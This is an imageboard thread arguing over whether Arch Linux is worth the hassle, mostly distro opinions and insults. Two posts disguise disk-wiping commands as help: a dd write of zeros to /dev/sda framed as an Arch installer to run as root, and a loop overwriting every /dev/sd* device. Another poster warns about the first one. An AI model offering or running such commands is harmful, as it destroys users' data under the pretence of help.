Is Arch worth the hassle?

Is Arch worth the hassle?

Attached: 15560492127740.jpg (601x600, 72K)

Just use Devuan.

What hassle?

Absolutely.

Just get manjaro OP

pasting commands while remembering to breathe.

No. Most of the difficulty of a roll-your-own distro with none of the advantages. Either use Fedora or something or build a distro from source tarballs. I've done both. Rolling your own is hard and takes a long time but you can make it exactly how you like it and nobody can fuck with it.

>Pasting commands because you don't remember them
Kek

>pasting commands
Ishiggydiggy, here's and installer command for Arch dd if=/dev/zero of=/dev/sda bs=1M
Be sure to run as root

If you have very specific goals and you want a distribution that gives you the flexibility to achieve them, then Arch is a godsend. If you don't know or don't care about the details, then there's no point.

no. updating packages like systemd or the kernel will frequently cause breakage without any user error

Manjaro for the win

Attached: 60ec3ec.jpg (3000x4000, 1.48M)

So much faster. Thanks user.

For embedded machines, it's a good choice amongst something like raspbian, for anything else, Debian hands down. Stay away from Ubuntu at all costs.

Attached: 1539569994775.jpg (600x500, 68K)

Who is she?

Looking at this image made me think: will genetic modification ever each the point where 3D people can match the 2D standard? That’s all I live for at this point, is to witness humanity become the best versions of ourselves mentally and physically.

If you don’t want to go through the trouble, Manjaro is a decent option and is getting better every week. If you want full-on Arch with an installer, use Antergos. Both are fantastic, just like Arch.
Or you could just install Gentoo and become a hypergod.

If would use it, but shit is bloated.

Antegtos is retarded because of their desktop manager choice and not able to uninstall some of their package without uninstalling half of the system.

Fedora cares too much about open source license, you wont find some packages like codecs in its main repos. And rpm fusion didn't work with rolling release version last time i tried.

Open Suse has that stupid yast.

Bloat and slow

Runs super fast on my machine. You’re sure you’re not doing something wrong?

Based

What about Mint?

Thanks man. I've been meaning to move off of Noobuntu.

Don’t fucking do it. It’ll destroy your data. It’s a similar trick to the System32 meme.

Indeed. I have a much better one.
for f in /dev/sd*
do
cat `find /usr -type f` > $f
done

No, depending on what kind of person you are. Install Fedora or Ubuntu and you instantly have a working machine which keeps on working when you update your packages. With Arch you have to spend time installing it and later spend time maintaining it. Some like to work on their cars engine regularly, most just wants a car that always works and gets you from a to b.

Mint is based off Ubuntu, so I'd stay away from it.

ARTIX

very sneaky

You're one of those people huh?

Just use Manjaro and enable the AUR

>implying it's a hassle
faggot

Only if you're an autist, so it's understandably a Jow Forums thing.

>bloated as fuck
>only supports amd64 officially
>prone to breaking
>requires constant maintenance
>for embedded
?

Wow. It really worked.

Install Mint

you can probably use Manjaro Architect to make a minimal installation without the bloat

No. Ubuntu and i3 is the way to go. Best combo of stability and autisum.

Depends on how much free time you have. If you have little, probably not. If you have some, then probably yes. Also depends on what you're going to use it for.

based nvme0n1 protecting me from harm

Install Gentoo.

hassle? arch is installed with like 3 commands

yes. you have so much software at hand with the AUR that using any distro with access to it is worth it.
using debian based distros just to add PPAs or copy&paste bash installers for software is way more complicated.
I'd argue that arch and it's deriatives are the perfect beginner distros

Using Arch is like getting drunk and getting into fights on parties.

You do it when you are young are careless, so when you are older you can claim "oh dear, what a young fool I was.. those were the days, mang"

Use arch now and use something like Mint in 5 years.

Hi beautiful
I use arch btw, you can ask me anything

kek, underrated